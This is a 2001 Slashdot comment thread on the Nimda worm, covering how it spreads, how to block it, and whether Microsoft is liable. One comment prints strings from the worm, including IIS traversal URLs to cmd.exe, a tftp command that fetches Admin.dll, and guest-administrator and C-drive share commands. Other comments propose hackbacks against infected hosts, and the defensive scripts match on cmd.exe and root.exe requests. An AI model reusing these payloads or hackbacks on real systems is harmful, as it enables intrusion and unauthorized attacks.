And for it to reach fullbore speed, like it is, it has likely been spreading for a couple hours before this from the time of initial infection. It takes a while for a new attack to get so many hosts to make it stand out from the background noise like this (overlooking the academic exercise done a couple weeks ago where it was figured the entire 'net could be compromised inside an hour).
I mimedecoded the readme.eml that one of the infected web pages was trying to send me, and found the following strings in the executable:
S ha res\Security
/add
/add
/active
/add
. %c 1%1c../..%c1%1c..
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
What's that? A script kiddie virus kit?
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
I wouldn't know a Windows script if it came up and hit me in the face, but I'll bet dollars to donuts that that's opening up a file share on your entire C drive.
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
This looks like the list of exploits it tries, and the second last one looks like it's trying to exploit shares.
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
Looks like an SMTP connection script, so I guess it does spread by email as well.
The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
Be careful what you wish for...
While e-mail attachments are a particular worry for the Microsoft platform, worms can exist for any platform with security holes -- which is essentially all of them. There have been UNIX worms in the past and there will be UNIX worms in the future.
The major drawback to UNIX worms in the past wasn't that UNIX was super-secure, as some Slashdotters would have you believe, its that 'UNIX' just represented so many different platforms on different processors that a single do-it-all worm would be very difficult to write. This is starting to change as Linux/x86 is adopted more and more...
Anyway, my point is, if people start suing Microsoft over this, Linux distro companies and even potentially individual Linux programmers could also be at risk. If Microsoft's EULA doesn't protect it, why would the no warranty clause of the GPL protect GPL programmers? In essence the licenses are the same in that regard.
Such a lawsuit would be annoying to Microsoft... to Linux companies and individial GPL programmers it would be devestating.
If you aren't certain that your WinNT box is safe, deny your entire subnet for the time being.
Start ISM/MMC. Expand your computer's view. Right click on your Default Web Site. Choose Properties.
Click on the "Directory Security" tab.
Click the "Edit" button for "IP Addresses and domain name restrictions".
With "By Default, Grant All Computers Access" checked, click the Add... button.
Set the Type to "Group of Computers".
For the Network ID enter the first byte of *your* IP address and the rest 0s (e.g. my IP is 216.27.140.214, so I put in 216.0.0.0).
For the subnet mask, enter 255.0.0.0
Click OK. Your Website will now deny access to anyone in your class A subnet, where this worm is attacking. (How is it spreading across subnets?)
I still think that the timing cannot be coincidental.
By the way, what gives with the "offtopic" comment. Someone must be using a different dictionary to me, I guess.
All threats, or just viruses that contain a threat? I would hate to think that saying something against the government would be considered an act of war.
If tits were wings it'd be flying around.
I agree, but that doesn't mean it ain't bullshit that the big media companies are trying to shut down the peer-to-peer nature of the internet... and if you think that isn't about keeping you glued to the tube, they've already eaten your brain.
Expanding a vast wasteland since 1996.
I think the biggest cause for the spread of it in a corporate environment is that IIS is turned on by default.
Why does MS (and IT departments) have IIS running by default?
Everyone running an OS by now should run a minimum of services/applications by default.
Live and learn I suppose.
Here's what I did to stop it so far:
1. Rename the outlookexpress executeable
2. Delete auto-run EML file type thing
3. Delete README.EXE
4. Delete *.EML
5. Make sure there is no *.EML in your startup
6. Reboot
7. Install Linux 8^)
Krispy Cream is people
If anybody knows what URL executes commands on the compromised server or a relatively open hackback that can be scripted looking at apache logs, it would be greatly appreciated.
Before someone gets all uppity about the morality of hackbacks, we're talking harmless start default browser and get pointed at a page telling you how to fix it. This was extraordinarllily effective at getting people patched when code red went about: 5000 hits on day 1 to the patch page, 72 on day 2, and it stayed relatively static after that.
Help us build a better map!
Run system file checker after you get this. Riched20.dll may be corrupted. My headers looked like this:
d esktopdesktopsamplemakefiledesktopjeditcvsmakefile jeditcvsmakefiledesktopdesktopjeditcvsmakefilesamp lejeditcvsmakefilemakefiledesktopjeditcvssamplemak efilesamplesamplejeditcvsdesktmail-incoming2.ahnet .net.jeditcvs
A AA AAAAAAAAAAAAAAAAAAAAAAAAAA
Received: by mail (mbox 7406.comments)
(with Cubic Circle's cucipop (v1.31 1998/05/13) Tue Sep 18 10:05:38 2001)
X-From_: kuzo01@hotmail.com Tue Sep 18 09:48:25 2001
Return-Path: <kuzo01@hotmail.com>
Delivered-To: 7406.comments@mail.ahnet.net
Received: from NIGHTCRAWLER (unknown [198.31.205.12])
by mail.ahnet.net (Postfix) with SMTP id 5810065B24
for <comments@vrml3d.com.>; Tue, 18 Sep 2001 07:34:22 -0700 (PDT)
From: <kuzo01@hotmail.com>
Subject: ware\Microsoft\WindoJ..b4 á.samplesamplesampledesktopjeditcvssamplemakefile
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <20010918143422.5810065B24@mail.ahnet.net>
Date: Tue, 18 Sep 2001 07:34:22 -0700 (PDT)
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA
[the remainder of the message is base64 encoded, also please note that some of the characters in the Subject line are unprintable and were replaced with '.' when pasted]
I was alerted to the problem by a dialog box that quickly disappeared, and a lot of extra hard drive activity. I crash-booted my box, and when it came back up there were no extra processes or files, and the registry checked out but that DLL was corrupted.
For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
Hello,
/scripts/root.exe>
/usr/local/sbin/iptables
Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks
JM> to lessen the impact? One idea: Once a probe is sent, the prober's
JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file
JM> that all children can share) and new connections from that IP are no
JM> longer accepted.
Here's a possibility but I need help with one aspect:
A) create a rule in your apache httpd.conf like this:
<Location
Deny from all
ErrorDocument 404 http://www.everydns.net/blockip.php
</Location>
B) create blockip.php (or use perl or whatever[read: python])
<?
$iptables = '/usr/local/sbin/iptables';
$ip = $REMOTE_ADDR;
$blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;";
system($blockline);
?>
C) the caveat here is that you need to give the webuser (nobody)
access to iptables. This can be done in sudo like this:
nobody ALL=NOBODY:
The MAJOR problem is that you have now given your entire web site
access to iptables. If you have a machine which has no "users" then
this may be okay for you however for most of us it is not. Do any of
you have a way to call a perl script directly from the httpd.conf
entry and perhaps pass the REMOTE_ADDR to it? I know there's a way
and I'll look for it, but in the meantime -- any ideas?
Thanks,
David Ulevitch
davidu@everydns.net
# Hack the planet, it's important.
We were victims of this virus as well. Only this time what happened was it used RealPlayer to keep respawning itself, causing explorer to crash repeatedly and eventually fill up virtual memory until it crashed.
This made it problematic to figure out what to do to stop this because I couldn't even do something as simple as look at my system drive. Fortunately, I was able to use Taskmanager.
If anybody runs into a problem like this, here are a some tips:
- Explorer is basically hosed using this type of attack. However, Taskmanager (set to always on top) will allow you to perform basic file operations. From Taskmanager, go to 'File/Run' and hit "Browse". When you rightclick on a file/folder you can do things like delete, rename, etc.
- In this particular case, RealPlayer was being used to cyclicly run itself over and over again, so I renamed the 'Real' folder to 'Real_', thus making Windows think the program's non-existent anymore. This was tricky because the file was sometimes in use, but I was finally able to manage it.
- I found the 'readme.eml' file on the system drive. I'm still trying to determine how it got there, but it can be prevented from entering there by creating a 'readme.eml' folder, as my coworker recommended. This will prevent a file with that name from being created in there.
- If you have trouble deleting the files that were being run, check to make sure that they're not 'System Files'. I ran into that problem.
"Derp de derp."
First of all, the current topic is a "Microsoft Internet Information Services Worm" and nobody is saying otherwise.
Second, in the SirCam threads on Slashdot, we had 200 people, including CmdrTaco calling it a "Microsoft Outlook Virus/Worm", when in fact it was not. It was a Win32 program that was completely mail-client independant, although it would grep the Windows Address Book (used by Outlook in some configurations, but not others) and IE's cache directories. Lots of "advocates" that were discredited by not getting their facts straignt.
Although, I agree with the point -- Calling something a "VBS Virus" is retarded given that there's nothing particularly special about the Visual Basic Script language that makes these viruses possible.
Whenever I hear the word 'Innovation', I reach for my pistol.
This is a really great Perl module that can help to combat the CodeRed virus and could possible even be used on Nimda:
Apache::CodeRed
Wooden armaments to battle your imaginary foes!
we tried this here.
if there is a <script&> tag in the message, ie seems to still execute it. Here is a test eml file.
---8<---
From me@you.org
Subject: test message
From: the devil <devil@evil.org>
To: you <you@yourcomputer.org>
Content-Type: text/html
<body>
<script>
window.open('http://www.microsoft.com');
</script>
This is a test eml file. tell me if you see it as plain text.
</body>
---8<---
Why aren't you encrypting your e-mail?
NO! Here's what wget showed me for one host:
[message/rfc822]
So this thing is really evil:
1. it uses many forms of attack
2. it attacks server _and_ clients
3. it propagates by tftping the load from altering hosts (probably from the host which
did the attack before)
4. it alters the content type for the client infection via http+IE
People who fail to patch their systems should be sued for incompetance. Whether it be microsoft, linux or what not.
-
What would be the point? Sure it would cause more chaos but presumably this box is already rooted and there are far easier ways to cause chaos. Your worm for instance could start corrupting files etc.. etc..
Letting in someone else's worm just takes away processing resources from your (presumably superios) worm
If you liked this thought maybe you would find my blog nice too:
I'm getting, with the other Windows-specific attacks, one Non-Windows specific (rather a perl/CGI specific) attack: a request for "libwww-perl/5.51".
-- @rjamestaylor on Ello
This is all well and good when it is Microsoft. But what happens when these things start hitting badly administered Linux/BSD/Solaris boxes? Will you be so quick to demand Red Hat send out CDs and pay damages? Doubtful.
Blame the admins and only the admins. I can forgive not patching something the first day, but by now? What are these people doing?
Always (fr)agile, ready to (c)rumble...
Enterprise software from Microsoft.
People shape laws. Not the other way around.
I mail every single one I can get an email address for, but frankly it's a losing battle and shouldn't be my job anyway - many of these servers are living on dhcp leases from their ISP.
I think that a person who's running a rougue computer that's breaking into other people's machines should be shutdown by their ISP - and they afterall are the people who can match DHCP leases/times with email addresses/accounts.
I'd like to see ISPs take a public proactive initiative in this area
I've been hit by more than a dozen servers starting this morning. My little 1.2MB adsl line is hurting :(
Yer ADSL line - jesus, I'm running a small corporate network with an ISDN line (no DSL available), and this poor thing has been just saturated with incomming traffic (of course, the machines here aren't vulnerable, but still...)
Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org
I've got an idea...how about a nice, simple 404 page? You know, maybe something like the "default" 404 page, with maybe a link to the site's home, and maybe if you're feeling really frisky, a link to the site map (if you have one).
I fucking hate it when I go to a site, click around, run into a 404, and i get a page complete with all the layout and everything else of the rest of the site, and somewhere buried in there is "by the way, the thing you wanted to see isn't here". "404 - Not Found" in big-ass letters is a much better way of doing it.
But nobody ever listens to me.
"That's Tron. He fights for the Users."
That's it! i'm sick of all these worms trying to get cmd.exe when i'm running linux! I'm gonna collect their IPs and flood them with requests for /etc/passwd!!!! If you want to contribute IPs or bandwidth, join the Passwd Flood Network (PFN)!! :)
They that quote Benjamin Franklin on liberty and safety deserve neither.
Please don't flame me if I'm way off base - I'm not very familiar with the way Google caches sites - but might it have cached your pr0n images? Could you just run a search for your site on googl, then access the cached version?
I'm the stranger...posting to
NIMDA is getting mentioned on the FBI briefing.. Ascroft is talking about it like it's a major security hazard.
cool!
"Yes.. no matter what the culture, folk dancing is stupid." -MST3K
Agressive but directed? You mean like shutting off my friggin port 80 access again?
I agree that my script will only work after they've come, hit my box, and moved on. But it'll stop repeat attempts. At least slow them down a wee bit as successive port 80 attempts will have to timeout (not that I DENY'd and not REJECT'd).
dirk
I keep trying to pick fights, but I can't shake this Excellent karma.
http://www.rainfinity.com/scripting_fix.jpg
the new macafee datfiles also successfuly fix it (we tested, their first one didn't work!)
I've seen so many "patriotic" emails lately that it's obvious that the social engineering situation is ripe for the plucking.
-- Geof F. Morris
This virus isn't affecting just IIS servers.. it's being spread by all Windows computers.
This is correct, really. After a machine either: a) visits a webserver that's been infected or b) reads an email that was infected it then becomes an infection vector it's self. No, there's no admin.dll - that's only on NT/2K servers, not user workstations.
(Though, someone may correct me if I'm wrong ;-)
Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org
They were negligent when they created software and technologies that are so easily exploited.
.sig here - "Frustrated? Don't throw your computers out the window, throw the windows out of your computer!"
This isn't a microsoft abuse. I can go down the street to bob's lawn care and get materials to create a car bomb. Does that mean that Scott's Turf Builder is responsible for my actions? Microsoft creates a product (outlook) that checks email. It checks email, and fairly well, and in a way that is easy to understand and simple to use.
This is simple applied economics, supply and demand. There are more windows users out there than anything else, by alot. And the average windows user does not know as much about how their computer works as the average *nix user, again, by a lot. To bring the supply and demand into it, it is easier to write code for windows, there are far more windows boxen, and the users know less about the inner workings - therefore more time is spent by hackers/scriptkiddies learning exploits and writing viruses. If linux was the world's premier operating system, and my mother used KMail or Pine, i'm sure the k|dd|3z would be writing exploits for that.
Now, i don't pretend to say that Microsoft makes a superior product. It is definately less secure. However, there's a world of difference between a windows user who may, sometime in the lifespan of his computer, go to www.windowsupdate.com and download patches, and Bruce Perens using apt-get update on a daily basis. You can't reasonably hold microsoft responsible for the upkeep and mantinence of literally millions of desktop computers in the united states alone. Nor can you fault them for releasing a product that is not "hack-proof", as, to my knowledge, no such product exists.
To listen to CNN and some of the posts by the slashdot crowd, you would think that Microsoft created Windows solely for the purpose of propagating the Code Red Worm. Let's not forget the simple fact that somewhere, someone wrote that bug, and they wrote it for the platform that would allow it to do the most damage, and that platform is windows.
Now, if you're gonna criticize microsoft, put your money where your mouth is, and write your own operating system, and get it on the desktop of 97% of the computer users in the united states, and have it impervious to viruses. Or be logical, and talk to people about linux. Educate them that there's something better out there, more secure, crashes less. Put debian on your mom's box, teach her Opera. Use the line i saw on someone's
Less bitching, more solutions.
~z
sig?
So you can explicitly deny execute access to TFTP to the IUSR_computername account.
Trolls throughout history:
Jonathan Swift
Start->Run, type in "regedit." Open the HKEY_CLASSES_ROOT folder, find .eml, then right-click its value and select "Modify." Copy and paste this value into a file somewhere where you'll be able to find it again. Then change the association like above.
main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
Seeing as it's known how these worms spread (such as Code Red, etc.), and you know that the computers that are connecting to yours ARE infected, couldn't you use the known exploit to hack their IIS service?
.ida file access) that if the buffer overflow contained random data, it would shut down the IIS service (IIS 5.0 will auto restart though). Seeing as it's the IIS service that's running the rogue virus, wouldn't this stop the threat, at least temporarily? (Or, does is the .ida file exploit used to load a larger virus that runs standalone?).
Microsoft says in their documentation on the Code Red exploit (through the
It'd be simple to create a file with the name that the virus tries to GET (and enable Apache to execute that extension). This script would then send a GET request exactly like Code Red to the affected server, with random data in the overflow area. (about 2 lines of Perl).
The IIS service should then shut down, and if it's version 5.0 or later it will restart (possibly clean).
Comments?
MadCow.
I used to have a sig, but I set it free and it never came back.
Microsoft's published a handy-dandy GUI tool that will eliminate most of these types of worms. Go here
l easeID=32362
http://www.microsoft.com/Downloads/Release.asp?Re
"BSD is about people pissing each other.." (Moid Vallat)
A book could have been written on "Lessons learned by Code Red", but it wasn't, so here are some really random thoughts:
Network design:
The new, but simple attack strategy, of hitting neighbour IP adresses, should be a wake up call for all, since this allow for very rapid infections of LAN
Correct me if I am wrong, but wouldn't it be fair to say, that for Code Red to infect the LAN side, the network (and firewall) is fundamentally designed
wrong? Why should a webserver on the public internet, be allowed to issue GETs through the firewall, to the LAN side?
Eg. a company has a public webserver (host A), and a LAN-side server (host B). Of course they have setup their firewall, so that host B, can't be reached directly from the Internet. But for some reason, (people are often cited for, that it is convinience), they make it possibly for all kind of traffic to reach host B, as long as it originates from host A.
Patching:
People often say; "Just patch, and you will be safe". But patching is just the first line of defence.
Some day, a Code Red style worm, exploiting an unknown flaw, perhaps even a flaw that are not easely patched like a "standard" buffer overflow. The speed of such an infection could be overwhelming, with perhaps 100.000's of hosts infected per day, and worse, since the infect algorithm, seems to be very effective in getting inside LANs, the problem may reach infocalyptic proportions.
My point is, that a secure network _design_ with defence in depth, is a necessity, and may stop the infection on the Internet-side.
Perhaps "network plurality" may be something; eg. if one is running MS web-servers, then deploy a Linux/*BSD firewall.
Finally, the LAN side seems very vulnerably now. Sysadmins now face, the overwhelming, Sissyfosian task of patching, upgrading, and locking the LAN-side, as tight as if it were on the public Internet. That just won't happend.
Futher ranting on patching; Why does (some) vendors mix security fixes, and non-security, non-critical bug-fixes, and, worst of all "enhancements" in the same patch? (are you listening MS ).
No wonder SysAdmins are hesitant to patch LAN side, produktion servers when the patch is more than 50Mbyte.
They must wonder whether their systems may BSOD on the spot. (How many times was MS-SP 6 pulled, before it reemerged as SP 6a, twice?). Or does all the new "enhancements" or bugfixes break "company-wide-important-app"?
And speaking of "defence in depth"
Not many networks seems to secured that way, or monitored at all by eg. IDS's. Yeah, money seemed to be spend on "surf-blocking", or monitoring employees mail for four letter words, and badmouthing of the boss.
From my reading of usenet and weblogs on Code Red, it seems that most people discovered it, since their MS-NT 4.0 servers crashed more than usual, or that their managed switches, and IP-printers locked up.
I am no better than the most, I am still reading up on Tripwire and Snort.
NAT
I like NAT
But NAT gives rather less protection, if portforwarding is used; eg. small company buys a xDSL connection, and are issued small router that does firewalling and NAT. So they make portforwarding to p:80, and closes everything else. But Code Red style worms just thrive on such a setup; It is handily portforwarded into the LAN side, and will spread real fast once inside.
And NAT and firewalling doesn't help at all, if the worm is multi-vectoring through mail and webbrowsers:
eg. the first infections is by mail. The trojan then watches were people surf, and tries to infect those sites.
If succesfull, the trojanend machine, deploys a payload on the website, that further infects all vulnerable webbrowser, visting the site.
On infected machines.
Every attacking machine are announcing to the world that it is infected. (A clever, fellow slashdotter
wrote a piece on this, but I can't find the link now)
Further, more malicious attacks may be instigated on the affected machines. And these, second wave-attacks may not appear in any logs, they may even be impossible for any IDS to detect.
And speaking of IDS's; how many actually monitors traffic going out from the network, especially through port 80?
People may have gotten by, by just removing the actual trojan until now. Perhaps this time too, but
next time it is likely, that all the script kiddies in the world seizes the opportunity to mass infect the infected machines with new and improved root-kits.
Imagine a DDoS from a skript kiddie, controlling 50.000 machines residing all around the globe. Good luck filtering that out on the router, or even your upstream providers router.
Or even worse, a skript kiddie with a clue, a personal grudge against your company, and having a root-kit on your LAN.
And more; it seems like a lot of Code Red attack machines, were W2k Pro's with accidentaly installed web-servers.
Now, the fools with upatched boxes and xDSL lines are hard to do anything about, but it also seems that a lot of accidently web-servers, were found on company
VPN's:
VPNs are often labelled as something that enhances security, but as other point out, they are actually the exact opposite, since they dig a deep hole in the firewall, into the corperate LAN. Good cryptation and authentification by VPN's, doesn't help, if Mr. Traveling Salesman are trojaing a worm, when he connects the LAN through his laptop.
In short, we must all rethink our network design and security. Firewall and IDS on the inside LAN. Lock and patch the LAN, as it was on the public Internet. Use eg. "port mirroring" on the core switch to a "silent" monitor box.
Run network scanners like nessus (www.nessus.org) and nmap on all LAN clients and hosts, so "forgotten" machines are discovered, and accidently installed web-servers are discovered.
Harden hosts with tripwire
Edit this to suit
/.*\/winnt\/system32\/.*/) {
/$dupe/){
#!/usr/bin/perl
# IISBLOCK - Infected IIS server blocking utility.
# by Bill Larson of Compu-Net Enterprises.
# http://www.compu.net. This header must be kept intact if you
# wish to redistribute the script.
my $check = 0;
my $line = "";
my $weblog = "/etc/www/logs/access_log";
my $infection = "/root/infected";
my $removelist = "/root/fwclean";
#open the web server log file specified above and start processing
open (HTFILE, "$weblog");
until (eof (HTFILE))
{
$line =;
chop ($line);
#Pattern match on IIS Attempts then strip down to the hostname/ip addresss
if ($line =~
$line =~ s/\ -.*//gi;
# This host is infected so lets do something about it.
}
}
close(HTFILE);
sub infected {
$check = 0;
# begin a check to ensure that we only take action once.
open (HTFILE2, "$infection");
until (eof (HTFILE2)){
$dupe =;
chop ($dupe);
if ($line =~
$check = 1;
}
else {
}
}
close(HTFILE2);
# If this is a unique host continue
if ($check eq "0") {
# time to add to the list of infected hosts
open (HTFILE2, ">>$infection");
print HTFILE2 "$line\n";
close(HTFILE2);
# add using the specified add command
# firewall software will print an error on invalid hostnames.
# Zap them one at a time maunally
system ("/sbin/ipchains -I input -s $line -j DENY -l");
# write firewall removal line to the remove list file
# modify this line for your specific firewall software
open (HTFILE3, ">>$removelist");
print HTFILE3 "/sbin/ipchains -D input -s $line -j DENY -l\n";
close(HTFILE3);
}
# That's all folks!
}
"GET / HTTP/1.0" 200 51230 "-" "Mozilla/4.0 (compatible; Setec Astronomy)"
Okay, I've modified my system for trapping Code Red attacks to log Nimda attacks as well. So, do y'all reckon SecurityFocus wants to know about it as well?
Oh, go on, check out my job.
Sort of, but I still agree. *BUT*, which would you choose if you wanted something that simply "ships" secure?
BSD.
(Yeah, it's a troll. But try any version of BSD for a while and you'll realize how sloppy Linux really is.)
--saint
SARC STILL has no update for this virus. MacAfee does but they tend to release fixes too early. (They very well may have fixed that I haven't used them in years)
This
I can go down the street to bob's lawn care and get materials to create a car bomb. Does that mean that Scott's Turf Builder is responsible for my actions?
In addition to that being an extremely tasteless analogy in light of recent events, it's not even a remotely fair one. In the case of IIS, Microsoft claimed that it was secure. In the case of their e-mail client (Outlook/Outlook Express), who in their right mind would write an e-mail client that executed code (vbscript, etc.) enclosed in an e-mail?
You can't reasonably hold microsoft responsible for the upkeep and mantinence of literally millions of desktop computers in the united states alone.
That would be like Ford/Firestone having to recall tens of thousands of tires just because they fall apart and cause accidents. Should drivers of Ford SUVs go to www.ford.com to check for recalls every day? Maybe in your world...
Now, if you're gonna criticize microsoft, put your money where your mouth is, and write your own operating system, and get it on the desktop of 97% of the computer users in the united states, and have it impervious to viruses.
That's the most ridiculous thing I've read in a while. So you are actually saying that I don't have a right to complain about an unsafe car unless I start my own competing car factory? Parents cannot complain about strollers that injure their kids unless they start a stroller company? People deformed by Thalidimide have no right to complain until they start their own pharmaceutical company and make a competing drug? How many moons circle your home world?
Or be logical, and talk to people about linux. Educate them that there's something better out there, more secure, crashes less.
Damn! All I had to do was talk to 25,000+ Road Runner users throughout the country, convince them to switch to Linux, and I could have avoided my connection being hammered for two weeks? Now you tell me. I'll put all of my belongings into an RV so that I can tour the country convincing people to switch to Linux.
Less bitching, more solutions.
Solution: AOL, Earthlink, UUNet, and every other major ISP in the world join together, sues Microsoft, and wins a large settlement. Microsoft stops developing and bundling bad video editors, paint packages, web servers, and online Othello games and, instead, concentrates on making a more secure, robust OS.
Turn everything on. And that is exactly what MS does with IIS to reduce support calls. Just run every ISAPI filter. Allow every http verb. Install IIS automagically when you install the server. Even though you haven't had the chance to create a non-system volume.
The fact is you can secure IIS but just like with linux it takes a bit of planning and work. And just for the record, I don't have a say in what platform the company's web servers run on. Advocating^H^H^H^H^H^H^H^H^Hwhining about the company's choice of supported platforms would get me fired. But because I value my job I invest the effort to learn a thing or two so I can administer the servers properly.
That's professionalism.
I don't want knowledge. I want certainty. - Law, David Bowie
I don't necessarily disagree with a lot of what you're saying, but you're going over the edge with these...
In the case of IIS, Microsoft claimed that it was secure.
Show me a quote where Microsoft claims that their software is perfect. No software is perfectly secure (e.g., wuFTP, my personal favorite that caused my system to be cracked). Show me perfect software, and I will show you a Hello World program. And don't try and tell me that OSS is perfect, I know better.
In the case of their e-mail client (Outlook/Outlook Express), who in their right mind would write an e-mail client that executed code (vbscript, etc.) enclosed in an e-mail?
I would. Just because a lot of people want to live in a world of green screens and monofonts doesn't mean everyone wants to live in the past. I like being able to open a document that someone e-mails me without having to save it off somewhere.
Not to say that these things shouldn't have better security, but there is absolutely no question that mail readers should allow attachments to be executed. Personally, I would like to see a "sandbox" concept applied to opening e-mail attachments.
Sometimes it's best to just let stupid people be stupid.
What would be the point?
Once you've applied a patch, how likely are you to realize you need to do so again? Also, many people will attribute, falsely, adverse affects of other viruses to your virus, making it more difficult to isolate yours. A patch for a worm that re-opens other holes would need to close all of the holes to be truely affective.
Some people have a way with words, and some people, um, thingy.
Do we really have to argue this all over again? It will never happen. If you want to know why, go back and re-read the Code Red discussion on Slashdot.
Summary: Microsoft did not write the virus. Microsoft patched the flaw over a year ago. Microsoft has made every attempt to patch known flaws. Microsoft makes every effort to notify known administrators about problems as they arise.
The real cause of the problem is braindead users that don't patch their systems. Sue them, if you'd like.
"And like that
It's easy to blame MS for all their "security holes", but folks...these have been patched for a while now...
Well, yes a good sysadmin would apply the patches.
However not all the systems affected by Nimda are servers. Nimda also propagates by email, and over Windows shares. Are you expecting users to apply patches at the same level of diligence as a professional sysadmin?
In any case it is clear that Microsoft does bear a significant portion of the responsibility for the quality of their product regardless of the individuals who (mis)use it. And it seems to me that one could make a very good class action suit against Microsoft based on the lost time and bandwidth these worms have cost based on a negligence argument. After all, Microsoft has known about these flaws for months. What have they done to proactively inform their users about the defects in their software? Have they issued a recall? Send messages to their users via email?
As a sysadmin running a Linux site, I have NOT agreed to any shrinkwrap wavier of incedental or consequential damages Microsoft's software has caused me.
Between the Code Red and nimda incedents, my employer is out quite a few billable hours.
From support@apple.com
Weird choice of return addresses, no? Fortunately I run a pine/procmail combo, and procmail managed to toss it into my SPAM folder.
Yep. Its installing something so any visitors to your website running MSIE with jScript turned on will infect themselves.
Clever, eh?
Liberty in your lifetime
Do we really have to argue this all over again?
No. You could simply admit that I am right or choose not to participate. Either one is fine by me.
Summary: Microsoft did not write the virus.
So what? They are still liable for product flaws. Suppose that your bank had a flaw on their web page that let anyone find your credit card number. Would you say that they were not to blame if someone exploited that flaw and used your credit card?
Microsoft patched the flaw over a year ago.
Not true. Microsoft made a patch available to those that knew about it. "Patched" would mean that they actively installed the patch.
Microsoft has made every attempt to patch known flaws.
Not true. There are many flaws in their "Knowledge Base" that have never been patched -- some of which are related to security.
Microsoft makes every effort to notify known administrators about problems as they arise.
Absolutely not true. The way you make the public aware of a product defect is to send registered owners mail (with a stamp -- not e-mail). Microsoft has not done this. Instead, they put notices up on their web pages and relied on users checking for patches regularly -- even though they know that most never do.
If Microsoft can send you snail mail telling you that they want to sell you a new version of Visual C++, they can send you a CD-ROM with patches for severe security flaws in the OS that they sold to you.
To minimise the amount of work Apache has to do when hit by an infected host, if you run mod_perl add these lines to your httpd.conf: :response);
/root\.exe|cmd\.exe|default\.ida/i) {
----
<Perl>
{
package Apache::Vermicide;
use Apache::Constants qw(:common
sub handler {
my $r = shift;
if ($r->uri() =~
$r->push_handlers(PerlLogHandler => sub { return BAD_REQUEST });
return BAD_REQUEST;
}
return OK;
}
}
</Perl>
PerlPostReadRequestHandler Apache::Vermicide
----
Thanks to Nathan Torkington for this code.
So what? They are still liable for product flaws.
In your opinion...
Suppose that your bank had a flaw on their web page that let anyone find your credit card number. Would you say that they were not to blame if someone exploited that flaw and used your credit card?
Apples and Oranges. If you want to make it apples and apples, I would not blame my bank, but instead the software company that created their operating system, or the person or group of people that wrote their CGI scripts. After all, the bank just maintains the PC's, they don't write the software themselves, correct?
Not true. Microsoft made a patch available to those that knew about it. "Patched" would mean that they actively installed the patch.
Wrong. I did not say Microsoft patched ALL SERVERS. I said Microsoft patched THE FLAW. In other words, they wrote a patch that fixes the flaw. They posted this notice to their list (which anyone can subscribe to) that dispenses security notices. They posted this news on their website. And I'm sure they will increase notifications due to this latest threat.
You probably think the gun manufacturers should be sued because someone shoots someone with a gun, right?
Absolutely not true. The way you make the public aware of a product defect is to send registered owners mail (with a stamp -- not e-mail).
This would make ZERO DIFFERENCE. Why? Because the people that are the cause of this problem don't bother to register their software. How exactly could Microsoft reach these clueless morons?
If Microsoft can send you snail mail telling you that they want to sell you a new version of Visual C++, they can send you a CD-ROM with patches for severe security flaws in the OS that they sold to you.
First of all, I run many servers running IIS. I've probably only registered a handful of them. We buy the software not from Microsoft but from third parties. I very rarely receive mailed ads from Microsoft.
So you're of the opinion that the same people that receive ads from Microsoft are the same people running IIS on their machines and haven't patched it?
The problem here is joe-blow not keeping his machine secured.
"And like that
I run a stripped-down Apache on the gateway machine.
In my httpd.conf:
NameVirtualHost *
<VirtualHost *>
ServerAdmin loki@twwol.dyndns.org
ServerName dummy.twwol.dyndns.org
RewriteEngine on
RewriteRule ^(.*) http://www.twwol.dyndns.org$1 [R,L]
</VirtualHost>
This does two things.
The important thing that I like about it is that it forces any requests to *.twwol.dyndns.org that don't match any of my hosts to get forwarded to the main www address, because the dummy host is first. (DynDNS allows for a wildcard feature; lookup any *.twwol.dyndns.org and you get my gateway; connect to port 80 and you wake up Apache, which then determines which host you really wanted and forwards the request inwards to the LAN (via a ProxyPass directive).
The other nice thing that I like about it is that it totally blocks access from bots that don't know the right name of my machines (which, naturally, you can't get from gethostbyaddr, since my DSL provider gives me my Official hostname). This includes, for example, Code Red worms; they connect to my gateway, get a 302, and wander along. Since I don't have a global CustomLog directive (I provide CustomLog directives for each of the real hosts), there's no logs kept for the annoying little Code Red worms.
Which is good. I run a stripped-down Apache on the gateway partly for security, but also partly because its hard drive space is not spacious.
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
